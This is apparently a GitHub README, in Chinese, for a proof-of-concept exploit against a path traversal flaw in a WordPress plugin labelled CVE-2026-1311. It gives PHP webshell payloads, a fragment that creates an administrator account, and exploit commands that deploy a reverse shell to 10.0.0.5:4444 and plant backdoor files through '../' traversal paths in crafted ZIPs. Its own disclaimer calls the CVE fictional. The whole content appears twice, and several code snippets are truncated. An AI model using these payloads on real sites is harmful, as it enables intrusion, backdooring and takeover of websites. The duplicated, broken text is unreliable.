hacker1337itme/CVE-2026-1311
GitHub: hacker1337itme/CVE-2026-1311
WordPress插件路径遍历漏洞(CVE-2026-1311)概念验证工具,演示从ZIP解压漏洞到RCE的完整利用链。
Stars: 0 | Forks: 0
# CVE-2026-1311
CVE-2026-1311
## 示例 PHP Payload 文件
### 1. 简单 Webshell (`simple_shell.php`)
```
";
system($_REQUEST['cmd']);
echo "";
}
?>
```
### 2. 隐蔽后门 (`stealth.php`)
```
```
### 3. WordPress 管理员创建器 (`create_admin.php`)
```
set_role('administrator');
echo 'Admin user created successfully';
} else {
echo 'User already exists';
}
?>
```
## 使用示例
1. **基本利用:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P password123
```
2. **检查插件是否存在漏洞:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P pass --check-only
```
3. **部署 reverse shell:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --payload-type reverse_shell --rev-ip 10.0.0.5 --rev-port 4444
```
4. **自定义 payload 位置:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --target-location "../../../wp-content/uploads/backdoor.php"
```
5. **生成用于手动上传的 ZIP:**
```
python zip_payload_generator.py -p simple_shell.php -t "../../../wp-content/plugins/malicious.php" -o evil.zip
```
## 此 Exploit 的主要功能
1. **完整认证处理**:使用订阅者凭证登录 WordPress
2. **插件检测**:识别是否存在易受攻击的插件
3. **多种遍历技术**:使用各种路径遍历绕过方法
4. **交互式 Shell**:在成功利用后提供命令 Shell
5. **权限提升**:尝试创建管理员用户
6. **文件上传/下载**:通过 Webshell 进行文件传输的能力
7. **多种 Payload 类型**:适用于不同场景的各种 PHP Payload
8. **代理支持**:支持配合 Burp Suite 进行调试
## 安装要求
```
pip install requests beautifulsoup4 colorama urllib3
```
## 重要法律声明
此 Exploit 代码仅用于**教育目的和经授权的安全测试**。未经授权对你不拥有或未获得明确测试许可的系统进行使用是非法且不道德的。描述的漏洞 (CVE-2026-1311) 是虚构/未来日期的,但演示的利用技术基于现实世界的路径遍历漏洞。
此代码演示了:
- ZIP 解压中的路径遍历是如何运作的
- 已认证的低权限用户如何升级到 RCE
- 利用后技术,包括交互式 Shell
- 检测和缓解策略
此 PoC 应仅在实验室环境或在获得明确授权的情况下使用。
## 示例 PHP Payload 文件
### 1. 简单 Webshell (`simple_shell.php`)
```
";
system($_REQUEST['cmd']);
echo "";
}
?>
```
### 2. 隐蔽后门 (`stealth.php`)
```
```
### 3. WordPress 管理员创建器 (`create_admin.php`)
```
set_role('administrator');
echo 'Admin user created successfully';
} else {
echo 'User already exists';
}
?>
```
## 使用示例
1. **基本利用:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P password123
```
2. **检查插件是否存在漏洞:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P pass --check-only
```
3. **部署 reverse shell:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --payload-type reverse_shell --rev-ip 10.0.0.5 --rev-port 4444
```
4. **自定义 payload 位置:**
```
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --target-location "../../../wp-content/uploads/backdoor.php"
```
5. **生成用于手动上传的 ZIP:**
```
python zip_payload_generator.py -p simple_shell.php -t "../../../wp-content/plugins/malicious.php" -o evil.zip
```
## 此 Exploit 的主要功能
1. **完整认证处理**:使用订阅者凭证登录 WordPress
2. **插件检测**:识别是否存在易受攻击的插件
3. **多种遍历技术**:使用各种路径遍历绕过方法
4. **交互式 Shell**:在成功利用后提供命令 Shell
5. **权限提升**:尝试创建管理员用户
6. **文件上传/下载**:通过 Webshell 进行文件传输的能力
7. **多种 Payload 类型**:适用于不同场景的各种 PHP Payload
8. **代理支持**:支持配合 Burp Suite 进行调试
## 安装要求
```
pip install requests beautifulsoup4 colorama urllib3
```
## 重要法律声明
此 Exploit 代码仅用于**教育目的和经授权的安全测试**。未经授权对你不拥有或未获得明确测试许可的系统进行使用是非法且不道德的。描述的漏洞 (CVE-2026-1311) 是虚构/未来日期的,但演示的利用技术基于现实世界的路径遍历漏洞。
此代码演示了:
- ZIP 解压中的路径遍历是如何运作的
- 已认证的低权限用户如何升级到 RCE
- 利用后技术,包括交互式 Shell
- 检测和缓解策略
此 PoC 应仅在实验室环境或在获得明确授权的情况下使用。标签:Base64编码, CISA项目, CVE-2026-1311, DNS 反向解析, Eval加密, Exploit, PHP安全, PoC, RCE, Webshell, WordPress漏洞, 协议分析, 反弹Shell, 后门, 恶意插件, 文件上传漏洞, 文件完整性监控, 暴力破解, 权限提升, 管理员账户创建, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护